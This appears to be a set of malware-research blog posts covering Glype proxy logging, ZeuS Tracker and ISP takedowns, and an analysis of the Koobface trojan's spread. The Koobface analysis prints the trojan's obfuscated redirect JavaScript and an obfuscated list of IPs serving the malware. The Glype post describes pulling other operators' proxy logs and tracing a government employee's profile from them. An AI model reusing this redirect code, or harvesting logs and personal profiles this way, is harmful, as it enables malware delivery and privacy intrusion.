If you are a network administrator and your company is runing Arbor Peakflow you just can activate the fingerprint using Arbor’s Active Threat Feed policies (ATF).

Bookmark, tagg it or email it to a friend:

More »

Reference: www.usmc.mil/news

Of course USMC is not the only organistion who banned Social Networking Sites from their network – there are many other companies and governments out there which followed the ban at the USMC and started banning Social Networking Sites as well. The two most often claimed reasons for such bans are commonly:

• Security issues while using Social Networking Sites (privacy, mal- and crimeware, targeted attacks, leak of information on classified networks)
• Performance problems/bottlenecks while using Social Networking Sites (direct impact on business/enterprise operations)

I don’t wan’t to talk with you about the sense of banning Social Networking Sites, but please let me loose a few words about it:

Often there are (legal and comprehensible) reasons to ban SNS from coperate- an governmental networks. But the problem is that often the responsible persons and/or administrators who decided to ban SNS don’t know the consequences that such a ban can trigger. Let me ask you: Do you really think that users will accept a ban of their *most-favorite-websites*? Of course most of the user won’t, so they will start trying digging holes in your coperate firewall and webproxies/gateways. The point I would like to outline in this post are the consequences you will trigger when banning social networks as well as the risks/threats which result out of this.

As said before, most user won’t accept a ban of SNS (and please belive me: that’s fact ). The first thing they will do after your ban becomes active is googling about by-passing your security infrastructure. The first thing your users will come accross are PHP-based web proxy scripts. One of the most popular PHP-based proxy script is called Glype: It’s a tiny, powerful and fast web proxy which is based on PHP. You just have to download the ZIP file, upload the “upload” folder to a webspace and start using your brand new webproxy. But WOW – hey, you even don’t have to install your own web proxy, you just can use sites like proxy[dot]org and get a fresh list of 5′000+ working web proxies!

What sounds like honey being poured down their back to your users is purly pain for the administrators and security folks of companies and governmental organizations: Within a few minutes users will be able to bypass security gateways easily. But let’t talk about the security risks of such Anonymous web proxies.

*** The bad things you don’t know about such proxies ***
Unfortunately the other site of the coin looks much worse:

• You don’t know who run these proxies
• You don’t know if these proxies are secure and clean from any malware and drive-bys
• You don’t know the intentions of the persons who runs these proxies (maybe they have mean ill?)

But you have must be aware of one fact: Those proxies aren’t anonymous! Web Proxy scripts like Glype&Co have a free configurable option wheter the administrator of the (glype-) proxy wants to log the requests which are passing his proxy or not. And you can be sure that the most Glype administrators will do.

*** The facts ***
Fact is that there are a lot of insecure servers out there running Glype: I was able to retrive the logs of several Glype proxies – and the results are really interesting. Some statistical information first:

I took a few hours to analyse the logfiles. The result of my analysis didn’t suprised me much (Top countries by unqiue IPs):

Most of the top countries shown above are explainable like China (for building a great firewall around its internet users), Turkey (for banning most favorite websites like Facebook, MySpace, Wordpress and Blogspot) and Germany (for the planed Data Retention Law).

Let’s take a deeper look at the origin IP addresses which are using such Glype proxies. A huge part of the Glype users are users from:

• Educational networks like schools and univiersities (trying to break the blockade of Facebook&Co on Edu-Networks)
• Home users from DSL- and dialup accounts (trying to bypass the internet censoreship of their ISPs/country)

Beside those (mostly) legitimate traffic (generaly I don’t support internet censorship in any country – so in my opinion this is some kind of legitimate traffic), there is a lot of noise coming from governmental and military networks around the world. I wont name any countries, but you can be sure that dozens of countries are affected. Some of the affected departments and ministries are listed below (I have translated the most of them from other languages, so don’t assume all of them belongs to the US – they don’t):

• Ministry of Foreign Affairs
• Ministry of Finance
• Ministry of Economy
• Ministry of Statistics
• Ministry of Administration and Interior
• Ministry of Industry
• Ministry of Interior and Justice
• Ministry of Labour and Social Policy
• Ministry of Social Development
• Department of Defense
• Department of Atomic Energy
• Department of Health
• Department of Science and Technology
• Department of Home Affairs
• Department of Water Affairs and Forestry
• Department of Environment and Conservation
• National Labratory
• National Police Service
• Residence of the President
• Atomic Energy Comission
• Centre for Atomic Research
• State police
• National Telecommunications Commission
• Supervision and Administration Commission
• State-owned news agency
• Various Military Test- and Command Centres around the globe
• Various networks which are just named as “Government of xxxx”

Let’s have a look at the Top websites accessed by those Glype proxies:

As we know most users of these Glype proxies are located in China. But for those of you who thought that the chinese users are searching for “free speach” and “tibet” – I have to disappoint you: The chinese folks seems not to be different than the folks from the west. So don’t be suprised that the top website is a chinese porn site (you didn’t know? China also blocks access to various porn sites).

*** Glype proxies as security risk ***
As I already pointed out I don’t see a problem in users bypassing internet censorship per se. They just have to know that they don’t really surf anonymously when they use such script based proxies (like Glype) and that those logfiles are propably accessible by anyone from anywhere.

But such proxies are becoming a problem as soon as they are used by employees of governmental and military organistaions (like shown above): These proxies could be a great resource for terroristic organization and foreign intelligence services! Many of the governmental traces I’ve seen are on facebook – so I was able to catch the names of employees of various governmental and military organizations. To show you the threat of such ‘information’ I will make real example which I saw in those logfiles.

You might have noticed that I mentioned Ministry of Foreign Affairs before (of a country which I won’t name here). While checking the logs I just came across a user who surfed on Facebook. The Logfiles provides a link to a profile of a employee of the Ministry of Foreign Affairs. When I checked the profile, I just noticed that this user is obviously a employee of the Security Service at the Ministry of Foreign Affairs. In fact, this person is now a high value target for terroristic organization and foreign intelligence services who are now able to get personal information about this person easily. This allows them to apply pressure and blackmail the person in order to gain access to classified information and documents.

*** Conclusion ***
My research on these Glype proxies allow me to make the following conclusions:

• Glype- (and other script based proxies) aren’t really anonymous
• You don’t know who runs these proxies
• Most users for those proxies just want to bypass internet censoreship of their country or schools/universities
• But there are many users from governmental and military organizations using those proxies too
• In those cases you may be able to hide your web traffic from your administrator but you will leave traces in other places which are probably a threat of your whole company!
• Administrators and security folks have to know about these risks and have to adopt compensating measures and/or providing awareness to its users
• If you run such a Glype proxy you have to know that you will propably be responsible for any illegal activites which are passing your proxy. Are you sure that your Glype proxy is not being abuse to access ilegal content like Childporn?

Bookmark, tagg it or email it to a friend:

More »

But maybe you wonder why the number of active ZeuS C&Cs still dropped after the Troyak shutdown. Let me clear this: After the shutdown of troyak, several other ISPs which went a platform for cybercriminals for month got obviously under massiv pressure from their upstream providers. Many of those ISPs contacted me during the last few weeks and made a clear statement that they no longer tolerate any cybercriminals in their networks.

The good news first:
Today, a month after the Troyak shutdown, the number of active C&C servers is still on a very low level. We are now at a point where ZeuS C&C servers get offline just a few minutes after they appears on the ZeuS Tracker.

And now the bad news:
During the last few days I just noticed that more and more ZeuS C&C servers popping up which are hosted on a FastFlux botnet. To be precise: It’s not new that cybercriminals are hosting the infections binaries (used to infect their vicitims) on FastFlux botnets. Even more it’s pretty new to me that the cybercrmininals are hosting their Command&Control servers (the servers which are hosting the dropzone) are also FastFlux hosted. For example:

• mmjl3l45lkjbdb.ru
• agreement52.com
• domainsupp.net

To go along with this ‘new’ trend I decided to add a new ‘level’ to the ZeuS Tracker:

Whenever you see a ZeuS C&C server which is FastFlux hosted on the ZT, the ZeuS Tracker will now provide you additional information:

As you can see above, the ZeuS Tracker shows up the assigned bots (IP addresses) as well as their status on Spamhaus’s XBL. Additionally the time to live (TTL) of the A record will be displayed (on FastFlux hosted domains mostly between 180 and 1800 seconds).

To get a list of ZeuS domains which are currenlty hosted on a FastFlux botnet you can just set a filter for “level 5” tagged domains on the ZeuS Tracker:

Currently there are just 9 domains hosted on a FastFlux botnet. But let’s see how many ZeuS C&Cs will move over to FastFlux hosting during the next few month.

Bookmark, tagg it or email it to a friend:

More »

Now it seems that this night their upstream provider VLineTelecom LLC Moscow (AS39150) just cut their peering with Group Vertical:

As of yesterday, this ISP has hosted 20 ZeuS C&C servers in their subnet:

Due to the fact that Group Vertical is offline again, the number of active ZeuS C&C server will just drop again today! But there is even more work left to do:

• AS49544 (INTERACTIVE3D-AS Interactive3D)
• AS29371 (GAZTRANZITSTROYINFO-AS LLC _Gaztransitstroyinfo_)
• AS34305 (EUROACCESS Euroaccess Global Autonomous System)

Let’s see how long these ISPs will stay online….

Bookmark, tagg it or email it to a friend:

More »

As you can see in the chart above, on March 9th 2010, the number of active ZeuS C&C servers dropped from 249 to 181! The first thing I thought was: There has to be some problem with the ZeuS Tracker cron script. I checked the script – everything looked ok. So the massive drop of ZeuS C&C server is fact. I noticed that six of the worst ZeuS hosting ISP suddently dissapeared from the ZeuS Tracker.

I verified the subnets of the affected ISP and came to the conclusion that Troyak-as (AS50215), the upstream provider for the six worst ZeuS hosting ISPs, was cut from the internet on 2010-03-09. As a result, the following ISPs lost their internet connetivity which finally resulted in a massiv drop in the number of active ZeuS C&C servers:

In total, 68 went down – It was the biggest drop in number of ZeuS C&C servers I’ve ever seen! Some guys have done a great job

*** UPDATE 21:03 (UTC) ***
Bad news – it seem that TROYAK-AS has found a new upstream provider to serve their malware to the world:

Source: http://cidr-report.org/cgi-bin/as-report?as=AS50215

As you can see on Robtex, YA-AS has just one upstream provider called NASSIST-AS (AS29632). Let’s hope that this is just the last breath of TROYAK-AS and that NASSIST-AS will cut their peerings with YA-AS quickly.

*** STATUS 2010-03-11 07:15 (UTC) ***
I just took another look into the ZeuS Tracker statistics – the number of active ZeuS C&Cs is still falling! In total, I’ve counted 104 ZeuS C&C servers which are no longer reachable from the internet!

As mentioned on the last update from 21:03 UTC, Troyak just found a new upstream provider. This means: Troyak-AS is reconnected to the internet since yesterday. Anyway, I just checked the those ZeuS C&C servers which where routed by Troyak – all of them are still offline.

*** UPDATE 2010-03-11 11:50 (UTC) ***
It’s a very busy day – Troyak is trying hard to get back online. This morning they disappeared again from the global BGP routing table and are now being routed by RTCOMM-AS (AS8342 RTComm.RU), located in Russia:

*** UPDATE 2010-03-11 21:30 (UTC)
Bad news: Since Troyak started their peering with RTCOM-AS, the number of active ZeuS C&C servers has increasted from 149 up to 191. For now, more than 40 ZeuS C&C servers are back online! This means that the cybercriminals are now able to move the stolen data to a safe place or a backup server. Additionally, the cybercriminals are able to update their config files served to the infected clients to set up a fallback server (if Troyak will disappear from the internet again).

*** UPDATE 2010-03-12 11:10 (UTC) ***
Another update: Troyak has changed their upstream provider again and is now being routed by NLINE-AS (AS25189 – JSC Nline):

Further links

• ZeuS Tracker
• Robtex: Troyak-as Starchenko Roman Fedorovich
• Krebs on Security: Dozens of ZeuS Botnets Knocked Offline
• The Register: One-third of orphaned Zeus botnets find way home

Bookmark, tagg it or email it to a friend:

More »

During the last year, ZeuS Tracker has tracked more then 2′800 malicious ZeuS C&C servers. The ZeuS Tracker has captured more then 360MB ZeuS config files and 330MB binaries.

First of all let me say that the success story of ZeuS Tracker was made possible by you. You, the readers of my blog as well as the contributors of ZeuS Tracker are the heros. Your effort, your avertising by word-of-mouth, your submission of new (unknown) ZeuS C&C servers to ZeuS Tracker, your support, this is what allowed ZeuS Tracker to gain so much attention and success. During this year, I’ve recevied hundreds of emails with constructive feedback, questions and offers by people who wanted to contribute their work. Thank you!

When ZeuS Tracker was started last year, the ZeuS C&C servers which where listed on it were online for dozens of days (and even for months). Today, a year later, there are a lot of CERTs, registrars and ISPs following one of the ZeuS Tracker RSS feeds to quickly take down new ZeuS C&Cs as soon as they get listed on ZeuS Tracker. Nowadays new C&C servers are very often shut down only a few minutes after their appearing on ZeuS Tracker. In this way ZeuS Tracker (and the resoponsible ISPs, Registrars and CERTs) are taking a considerable effort and make the internet a safer place. Special thanks to all the ISPs, Registrars and CERTs around the world which are helping to shut down malicious ZeuS C&C servers quickly!

The ZeuS Tracker project would not be possible without the help of a handful organisations and people which are sharing information and providing ZeuS Tracker a home. So I decided to make a small “Hall of honor” for all of those.

Hall of honor

Time is come to say thank you to all which are supporting ZeuS Tracker. Special thank goes to…

…for giving ZeuS Tracker a home	… for providing the MHR to ZeuS Tracker
…for providing Anubis to ZeuS Tracker	… for providing samples to ZeuS Tracker
…for providing samples to ZeuS Tracker

Additionally I would like to thank Malwaredomainlist (MDL) and MalwareURL for their cooperation in sharing malicious ZeuS C&C servers.

During this year I received several queries asking for permission to integrate ZeuS Tracker information into commercial products. This was a very difficult decision for me to make and I considered the pros and cons of this for a considerable time. Finally I decided to allow the commercial use of ZeuS tracker blocklists to a few companies: My intention with ZeuS tracker was always to protect as many internet users as possible from becoming victims of identity theft. The fact that the use of ZeuS Tracker IP and domain blocklist in wide-used security products will decrease the number of victims of identity theft convinced me that this approach comes closest to my intentions. But the ZeuS Tracker information itself will always be provided free to everybody.

I’ve recived a handfull emails concerning a commercial use of the ZeuS Tracker IP- and domain blocklist in security products. So I had to made a leading decission. I’ve to say, that it was really hard for me to decide, but finally I came to the decission that I allow the commercial use of ZeuS Tracker blocklist to a handfull companies. Let me explain you why: my goal was always to protect as much internet users as possible from getting victim of identity theft (This was also the reason why I released ZeuS Tracker Blocklist). I came to this decisioin due to the fact, that the use of ZeuS Tracker IP and domain blocklist in wide-used security products will decrease the number of victims of identity theft.

Below a list of organisation / sites which are using ZeuS Tracker in their services/products:

• Malwaredomainlist (MDL): www.malwaredomainlist.com
• MalwareURL: www.malwareurl.com
• SURBL: www.surbl.org
• OpenDNS*: www.opendns.com
• Emerging Threats: www.emergingthreats.net
• Autoshun: www.autoshun.org

* Used in their commercial products

As you might have noticed, ZeuS Tracker is now providing the ZeuS Tracker blocklist to SURBL. So every mailserver which is using SURBL in their spamfilter now automatically benefits from ZeuS Tracker domain block list.

Last but not least there are dozens of companies, universities and governmental organisations which are using the ZeuS Tracker blocklist to protect their users.

New Features

During the last few months several new features were added to ZeuS Tracker. Some of them are already public for a few months (but were never announced officially) and others have been finally launched today:
Anubis reports for binaries
The ZeuS Tracker is now providing you a Anubis report (Analyzing Uknown Binaries) for every binary which is in ZeuS Tracker. For those of you who don’t know anubis:

See anubis.iseclab.org/?action=about

Each binary on ZeuS Tracker has now a link to the associated Anubis report on anubis.iseclab.org. The benefit of the anubis reports is that it shows you several interesting information about the binary. For this purpose Anubis executes the binary in an emulated enviroment and traces the changes which the binary made to the computer. For example this include the changes made to the file system and windows registry as well as recording the network activities which the binaries makes while and after its execution.

Responsible Nameservers
I’ve added a namserver lookup functionality to the ZeuS Tracker cron script which now looks up the responsible nameservers of the ZeuS C&C domains which are listed in ZeuS Tracker (of course that’s just used for the ZeuS domains and not the IP addresses).

If you click on a domain which is on ZeuS Tracker it displays automatically the responsible nameserver. The text is a hyperlink, so when you click on it you will get a list of ZeuS C&C domains which are using the same nameserver(s). There is also a interessting break down of the top twenty nameservers used by ZeuS C&C servers on the ZeuS Tracker statistic page.

The goal of this new features is to provide the ISPs, CERTs and LEs (law enforcement) a better overview to the current hot spots. Additionally a nameserver-provider can now easily get a list of malicious ZeuS domains which he is responsible for and can take action agains the threat.

Sponsoring Registrar
Additionally to the nameserver lookup function the ZeuS Tracker cron script now also looks up the sponsoring domain registrar of a ZeuS C&C domain. Unfortunately it’s not as easy to get the sponsoring registrar of a domain. Therefore this feature is not available for all domains which are listed in ZeuS Tracker (approximately only 70%-80% of the domains which are on ZeuS Tracker currently are showing up the sponsoring domain registrar).

If you click on a domain which is on ZeuS Tracker it displays automatically the sponsoring registrars. The sponsoring registrar is a hyperlink, so when you click on it you will get a list of ZeuS domains which are also registered thru the same sponsoring registrar. There is also a interessting break down of the top ten sponsoring registrars on the ZeuS Tracker statistic page.

The benefit of this features is the same as for the responsible nameservers: Providing a collection of information for the responsible ISPs and CERTs as well as for the LEs (law enforcement).

NEW! ZeuS Tracker DNS Service (ZTDNS)
Another new feature is the ZeuS Tracker DNS Service (ZTDNS). First of all: What you definitly should NOT do is to use ZeuS Tracker DNS Service at a Email gateway. The service has been designed to be used by security experts and IT professionals to look up a domain on ZeuS Tracker quickly and NOT for mail cleaning.

The service works similar to a normal DNS blackhole list (DNSBL): You can check an IP address or a Domain name against the ZeuS Tracker DNS Service. If the IP address/domain is listed on ZeuS Tracker, you will get a positive response from the DNS daemon. You can request an A or TXT record. There are two DNS zones available:

• ipbl.zeustracker.abuse.ch (used to check a IP address against the ZT IP blocklist)
• uribl.zeustracker.abuse.ch (used to check a domain name against the ZT URL blocklist)

Requesting the A record will just return you the information whether a IP/domain is listed on ZeuS Tracker or not while the TXT record shows up more information like SBL status, country code, AS number etc.

Before you’re going to start using ZeuS Tracker DNS Service please be sure that you read the ZTDNS page.

Domain history
I’ve been asked for a domain history. Here it is: With the new domain-history feature it is now possible to take a look at the history of a ZeuS domain listed on ZeuS Tracker. It shows up the latest IPs that have hosted the domain before. This additional information can be quite interessting.

NEW! Binary & Config-file history
Additionally to the domain history feature I’ve added a history-function for the binaries and config files on ZeuS Tracker. When the MD5 of a binary or a config file changes it will be archived and added to the binary- or config-history. So you are now able to see how often a binary or config file on a specified ZeuS C&C rotates and if the file was already seen on other ZeuS C&Cs before.

Changelog

Beside the new features some minor changes were made to ZeuS Tracker:

• You can now sort the ZT monitor page by lastupdated
• I’ve revised ZT’s statistic page. There are now some nice graphics which shows you some interesting statistics about the ZeuS crimeware
• A handful small changes on the ZeuS Tracker startpage
• You can download all ZeuS configs or binaries packed in a zip file (see FAQ)

TODOs

Well there are still a few things left to do on ZeuS Tracker:

• Creating a RSS feed for domain registrars
• Creating a RSS feed for nameservers

Certainly, if you have some good ideas or feature requests don’t hesitate to drop me a line (contact form).

Bookmark, tagg it or email it to a friend:

More »

I asked myself: Is it be possible to poisoning Koobface’s captcha breaking infrastructure by spoofing captcha results? As I documented in my post Koobface – the social network trojan, the captcha breaking process used by trojan Koobface works as follow:

1. A bot would like to create a spoofed account (on Blogspot, Facebook, Myspace or whatever)
2. The register page is protected with a captcha – so the bot grabs and send it to the C&C Server (uuu20091124.info)
3. Another infected computer asks the C&C server for work to do at the same time
4. The C&C server sends the captcha to the infected client where the user of the computer solves the captcha
5. The infected computer sends the result of the captcha back to the C&C
6. The bot that originally sent the captcha now asks the C&C server if there is already a resolution for the captcha
7. If so, the C&C server returns the result of the captcha back to the bot
8. The bot can successfully register the spoofed account.

It’s pretty simple, so I decided to write a small script which simulates Koobface’s captcha breaking module (v2captcha.exe) .

After writing some lines of code, I ran my script. The script just asks the C&C server for new captchas to break, generates spoofed captcha results and sends them back to the C&C server:

Some words about the output of the script: the value [xx] is the thread ID of the procees, followed by proxy:port, followed by a string (“badboys”) that’s returned as faked solution for the captcha, the TaskID (previously received from the C&C server), the response of the C&C server and finally the number of spoofed captchas so far:

To make sure that the spoofed captchas are really accepted by the Koobface Command&Control server (C&C), I just infected a computer with Koobface’s Blogspot (v2newblogger.exe) module which is beeing used to create faked blogspot accounts. Afterwards I started my script again.

First of all the infected computer tries to register a new blogspot account. As excepted, the trojan grabs the captcha and sends it to the C&C server uuu20091124.info by using HTTP POST and calling the action save (a=save).

The C&C server responds with a HTTP 200 OK and returns a TaskID:

As you can see, the C&C server told the bot to use the TaskID 21300807 for further requests concerning this job.

In parallel, our script diligently asks for new tasks and “solves” them by sending a faked string back to the server. After a few seconds that looks like this:

Did you see it? Our script received the captcha with the TaskID 21300807 and has sent back the word “badboys” as resolution. That’s the captcha from our bot! Now let’s go back to the bot and check what answer it gets from the C&C server for the captcha submitted a few seconds before:

The bot asks the server if the captcha is already solved by calling the action “query” (a=query) and using the TaskID 21300807. The C&C server respond:

Strike! The bot recived badboy as resolution of the captcha – the captcha spoofing works!
Let’s run our script for some more minutes:

Okey, that’s really nice. Within around 45 minutes more than 4′400 captchas could be spoofed!

You may ask yourself why the spoofing is so simple. There are several reasons:

• Koobface is not doing any authentification of the bot
• The C&C traffic is not encrypted/obfuscated in any way (plain text)
• The C&C servers does only send the captcha to one bot for solving instead of sending the same captcha to different bots and comparing the results
• There is no limit for sending results to the C&C server
• The server doesn’t even check if a returned task id was indeed assigned – you can just post any TaskID and the C&C server will accept it

Conclusion
Koobface’s captcha breaking infrastrucutre is weak. Any IP address is allowed to send and receive tasks from Koobface’s C&C servers. There is no authentification of the bot. So with a few simple lines of code you are able to disturbe Koobface’s captcha breaking infrastructure massively so that captcha breaking process is no longer useful.

A positiv effect of the captcha result spoofing is that it prevents the bot from successfully creating faked accounts on blogspot, Facebook, Myspace etc. As a result of this and due to the fact that Koobface needs such faked accounts on social network to spread itself, the koobface infection vectore is broken.

As mentioned in my earlier post, it seems that the Koobface gang is offering a Captcha Decoder Servis. By disturbing the captcha breaking process the Koobface gang will lose money with every captcha which could not be successfully solved.

Happy captcha spoofing!

Bookmark, tagg it or email it to a friend:

More »

• Using some phishing tricks to steal credentials
• Creating fake accounts

There are two reasons why most cybercriminals are trying to phish the credentials from users of social networking sites instead of creating fake accounts by their own:

• Most of the time the register forms of the social networking sites are protected with a captcha
• At the moment, there is no reliable method to break captchas

As described in my post about Koobface last year, the Koobface trojan is able to “break” captchas (to be correct, the trojan isn’t able to break captchas rather then it servs the captchas to the infected bots where the captchas will be solved by the users). By using this technique, he is able to create hundreds of faked accounts on social networks (per minute!).

Creating malicious Facebook accounts
To spread itself, the trojan creates spoofed Facebook accounts on which he will post malicious comments and sends messages with a link to a malicious sites. For those of you who are not familiar with Facebook: Before you can write a message or create a message at the pinboard of somebody, you have to be a friend of this person. So before the Koobface trojan can start to post malicious messages he has to get some friends. Don’t be afraid, but even that is no problem for Koobface: It is able to send friend requests to hundreds of Facebook members.

When you log into Facebook, you’re browser will save a cookie on your computer. In fact Koobface uses the Internet Exporer installed on a infected computer to log into Facebook. So what would happen when you are infected with Koobface and you would try to access *your* personal Facebook account?

Uuuh?!?! What’s that?

That’s not my account ?!?! But who is Anyeta Fecher?
The answer is simple: That’s an account which was created by Koobface. But how does that work? I will show you:

First of all the trojan sends a request to a zombie, calling the module grgen:

The zombie/proxy will return some information about the account which the infected bot should create:

Lets’ take a deeper look at this response: The response will instruct the bot to create a new account (SOFT|ADD) using a email adresse (LOGIN) and password (PASS). The email address which is used by the LOGIN parameter as well as the password is scrambled (so you won’t be able to log in with these credentials). The zombie will return some more parameters like birthday, Facebook groups which the malicious account should join etc. The bot will now start with the registrartion of the account. During the registration process, he will get a captcha from Facebook which he will send to the C&C server. As soon as the captcha is resolved, the C&C server will return it to the bot which can now finish the registration process.

On the next step, the trojan will send a log back to the C&C server with some information about the registration of the Facebook account:

As you can see, the log is quite detailed (yeah, “click submit button” and “scan friend end” sounds funny…).
Now the trojan will start to “get some” friends. I suppose that the trojan will parse the member list of the group which he has received from the C&C server when he has requested the grgen module:

Let’s wait some minutes….. and then we will take another look at the malicious profile:

As you can see, the Koobface bot just sent out more than 1′000 friend requests on Facebook within a few minutes! But what suprised me much more is the fact, that all those people accepted the friend request. So I just ask myself why so much people accept friend requests from other people which they don’t even know?

Conclusion
Within a few minutes, more than 1′000 new friends were harvested by Koobface – all of them are potential victims now; as soon as the bot starts to send out posts/messages, it becomes a real threat to its friends.

So what we have learned:

• Please be careful with friend request from persons which you don’t know (this also applies to all other social networks like myspace, netlog, hi5 etc)
• If you find a malicious profile, report it to the administrator of the social network (eg. by using the report button)
• And last but not least: If you go to Facebook and you are logged in with a unknown profile, you are infected with Koobface….

Happy (and safe) social networking!

Bookmark, tagg it or email it to a friend:

More »

Recently I took a look into the Koobface trojan and it’s infrastructure. The result of my research was the post “Koobface – the social network trojan“.

Today, while I read thru my favorit blogs, I came across the post The Koobface Gang Wishes the Industry “Happy Holidays” at Dancho Danchev’s blog. It tells that the cybercriminals behind the Koobface trojan just published a Merry Christmas wish on the fourth (and final stage) of their infection process.

If you scroll down at the end of the page the following text appears:

When you read thru the text above, you will ask yourself “who is Soren Siebert”? I just asked me the same question, but I have an answer on this. When you look at the HTML Source code of the page, you will see that the text “Soren Siebert with his great article” refers to my post about the Koobface trojan:

Soren Siebert with his <a href="http://www.abuse.ch/?p=2103" target="_blank" >great article</a>

People how knew me personally also know that my real name isn’t Soren Siebert. Let me explain how the Koobface gang came across this name. On my blog you will find a reference to a disclaimer page in the navgiation bar. The disclaimer is written in german and was generated with a impressum generator provided by e-recht24.de. The webpage and the impressum generator is maintained by a laywer called Sören Siebert, which is also mentioned as source of the text on my disclaimer. So the Koobface gang just came across this name on my disclaimer and thought that this is my name.

Anyway, I’m a bit proud that the Koobface gang read my post about their trojan and the fact that my post was mentioned in the same way as well-known Antivirus vedors like Kaspersky and Trend Micro. That was a great Xmas gift from the Koobface gange – thank you!

Bookmark, tagg it or email it to a friend:

More »

The trojan is targeting users of social networks like Facebook and Myspace. Therefore the trojan have it’s name (Koobface) from “Facebook”. The trojan uses different modules which will be dropped from the internet after a successful infection. For example there is a module for captcha breaking and a module to create Blogspot accounts.

Let’s start with the way the Koobface trojan spreads itself (this is quite interesting).

*** Koobface Infection vector ***
I’ve just made a small chart which describes the way Koobface spreads itself:

(click to enlarge)

Here are some interesting stats about the amout of URLs which are used in this sophisticated attack:

Number of faked blogpost/bit.ly URLs in Stage 2: 34′332*
Number of hijacked websites in Stage 3: 509

* number still growing

You can view the full list of the faked blogspot/bit.ly URLs on the following page (the two lists will be updated in real time):

• List of faked blogpost URLs
• List of faked bit.ly URLs

The list of hijacked websites won’t be published. But I can publish a statistical breakdown about the geo location of the hijacked websites used by koobface:

Click to enlarge

<script>c6833='do';dc0d1bd="cqfiuqbemnit".replace(/[qfibent]+/g,"");ed9e='ent.r';
f1987="esafvnsaearvub".replace(/[savnub]+/g,"");ge2='rer';
ac8=eval(c6833+dc0d1bd+ed9e+f1987+ge2);b3c1='';h0cf16c3='mspli';
i7775="npkjdstd.dpcrloffrhm".replace(/[pjdtrlfh]+/g,"");j26='mys';
kb96="pdjaglfcfehrn.lfhcbomdk".replace(/[djglfhrnbk]+/g,"");l92='lnk';
m4ab1fa22=".vmblsdxw".replace(/[vbldxw]+/g,"");o5da6f7e8=ac8.indexOf(h0cf16c3+i7775);
p7e259a=ac8.indexOf(j26+kb96);q89=ac8.indexOf(l92+m4ab1fa22);
if(o5da6f7e8+p7e259a+q89!=-3)b3c1='&ms';
ncd1b57="hlbftqkmtmjpl:biff/gm/gbnmlbaqciinqbeklq.gfmnbmgag.qgoccchilobjbsit.
gbldjfcleck/c2m9jb2q/m".replace(/[lbfqkmjigc]+/g,"");
location=ncd1b57+"?biugbxosmt".replace(/[biuxsmt]+/g,"")+b3c1;</script>

The bit.ly URLs in in the second stage won’t need any additional code – they will redirect the victim to a hijacked websites in the third stage directly.

As I said before, the hijacked websites in the third stage are hosting Javascript code which causes that the victim will be redirected to the last stage which is finaly spreading the trojan. The IPs of the fourth stage webservers are hardcoded into the third stage javascript code (the list of IPs vary) :

var ipxgzet0 = [
'24.3' + '0.126.138',
'98.' + '206.3.117',
'90.' + '233.128.87',
'1' + '90.49.190.60',
'217.1' + '32.165.11',
'67' + '.173.62.160',
'6' + '6.57.229.246',
'17' + '4.103.205.78',
'84.1' + '09.34.247',
'79.176.' + '126.109',
'8' + '2.44.232.81',
'17' + '3.21.165.56',
'67.250' + '.29.114',
'99.15' + '5.75.173',
'1' + '73.29.194.142',
'7' + '1.236.10.136',
'94.171' + '.96.107',
'1' + '30.208.150.33',
'70.244.' + '114.178',
'99.1' + '2.240.214',
];

As you can see, the IPs are obfuscated. If you deobfuscate the list above you will find these IPs:

Finally the victim will be redirected to one of the IPs above which serves him a file called “setup.exe” (which contains the Koobface trojan):

Click to enlarge

Afterwards the trojan is testing the victims internet connection by sending a HTTP GET request to www.google.com:

If google.com answers the trojan contacts one of the 509 hijacked websites, which are already being used previously in the third stage:

But its not as easy: The hijacked websites are just being used as redirectors/proxies which will forward the request from the infected client to the real Command&Control server (C&C):

Click to enlarge

The traffic between the infected computer and the zombie/proxy is unencrypted. The answer of the Command&Control server starts with the string “#BLACKLABEL”. Due to this Koobface Command&Control server traffic is very easy to detect. The answer of the C&C server can look like this:

In this example, the C&C server just sent an order to the infected bot to download more executables. The executables (some kind of “modules”) will be downloaded and installed by Koobface. Within 36 hours I just found 13 unique MD5 hashes (=files) are dropped to the infected clients (bots):

Fortunately all binaries have a very good AV detection rate.
Some additional notes: The parameter “getexe” will drop a binary from the C&C server down to the client. For example: If you send “getexe=v2googlecheck.exe” to the zombie/proxy, the C&C server will check if a file called “v2googlecheck.exe” exist in his file repository. If the file does not exist the C&C server will return a empty file.

In the second request the infected computer sends some information about the installed modules to the zombie/proxy (remember: the first request just contained the paramenter “action” and “v”):

*** Koobface captcha breaking infrastructure

Before we start with the modules/plugins which the Koobface trojan drops, we will take a look at the captcha breaking infrastructure used by Koobface. Koobface is using the two backed server to control the captcha breaking process:

• capthcabreak.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)
• captchastop.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)

The modules involved in the captcha breaking process (v2newblogger.exe and v2captcha.exe) are using these servers. I’ve create a small chart which will show the Koobface’s captcha breaking infrastructure:

Click to enlarge

Some words about the way Koobface breaks captchas:

• The way how Koobface breaks captchas is very sophisticated
• The time between grabbing a captcha and breaking it is less than three minutes (most of the time just a few seconds!)
• Due to the way how Koobface’s infrastructure works, it’s possible to break hunderds of captchas per minute!
• In this way it’s possible to register thousends of fake bit.ly/Blogspot accounts per day

Additionally there is a interesting thing on the start page of the two domains used for captcha breaking. The sites are speaking about “Captcha Decoder Servis” including an contact E-Mail address, which looks like a commercial Captcha breaking service. The Koobface botnet obviously supplies enormous ressources for breaking captchas, like a ‘human’ grid computing network, so it would make sense to make part of it commercially available to third parties.

*** Koobface modules / plugins ***
Last but not least let’s take a look at a couple of Koobface modules dropped by the Command&Control server (C&C). Note that the cybercriminals can drop new files (modules) at any time.

v2prx.exe – A dnsfilter / dnsblocker module
Before we will take a look at the way this module works, we will look at a intersting relict of the author of this binary. If you look at the strings in the binary v2prx.exe you will find the following lines:

These are relicts of the authors complier. You can also see that he used the Microsoft’s Windows Driver Kit (WDK).

The module will create two SYS-Files in the sysem32 directory:

Afterwards he connects to a Command&Control server at ze-biz.com (85.13.236.154 – COREIX-UK-AS Coreix Limited London):

Notice the spelling of the strings in the HTTP header (case senstivie). The C&C server will tell the module which domains he should filter/block and which HTTP request he have to redirect to the Command&Control server.

v2webserver.exe – A simple webserver used to spread Koobface
This module will turn the victims computer into a webserver. A very interesting thing is the fact that this binary won’t be dropped to every bot. For comparison: The captcha breaking module (v2captcha.exe) has been dropped to my test script 419 times while I have seen v2webserver.exe just 197 times. Conclusion: Not every bot will be transformed in a “zombie” (which would be used by Koobface’s infection process Stage 4).

The module will install it self in the Program Files directory….

